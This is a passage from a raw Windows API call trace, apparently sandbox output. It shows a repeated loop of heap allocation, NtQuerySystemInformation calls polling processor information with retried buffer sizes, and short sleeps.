Size=0x90) returned 0x295c058 [0294.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0294.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0294.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0294.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.191] Sleep (dwMilliseconds=0x110) [0294.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0294.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0294.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0294.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0294.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0294.207] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0294.208] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0294.208] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.208] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0294.208] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.209] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.209] Sleep (dwMilliseconds=0x110) [0294.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0294.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0294.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0294.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0294.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0294.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0294.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0294.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0294.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.223] Sleep (dwMilliseconds=0x110) [0294.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0294.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0294.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0294.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0294.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0294.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0294.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0294.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0294.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.237] Sleep (dwMilliseconds=0x110) [0294.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0294.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0294.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0294.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0294.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0294.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0294.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0294.253] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0294.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.255] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.255] Sleep (dwMilliseconds=0x110) [0294.275] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0294.275] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.276] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0294.276] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0294.276] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.277] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0294.277] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0294.277] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.277] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0294.277] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0294.277] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.277] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0294.278] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.278] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.279] Sleep (dwMilliseconds=0x110) [0294.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0294.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0294.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0294.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0294.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0294.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0294.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0294.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0294.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.296] Sleep (dwMilliseconds=0x110) [0294.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0294.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0294.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0294.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0294.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0294.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0294.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0294.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0294.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.313] Sleep (dwMilliseconds=0x110) [0294.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0294.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0294.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0294.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0294.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0294.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0294.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0294.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0294.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.332] Sleep (dwMilliseconds=0x110) [0294.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0294.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0294.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0294.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0294.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0294.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0294.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0294.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0294.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.348] Sleep (dwMilliseconds=0x110) [0294.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0294.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0294.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0294.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0294.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0294.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0294.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0294.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0294.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.363] Sleep (dwMilliseconds=0x110) [0294.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0294.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0294.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0294.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0294.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0294.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0294.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0294.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0294.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.380] Sleep (dwMilliseconds=0x110) [0294.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0294.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.388] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0294.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0294.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0294.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0294.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0294.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0294.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0294.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.390] Sleep (dwMilliseconds=0x110) [0294.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0294.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0294.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0294.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0294.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0294.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0294.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0294.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0294.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.410] Sleep (dwMilliseconds=0x110) [0294.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0294.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0294.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0294.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.425] HeapFree (in: hHeap=0x2560000, 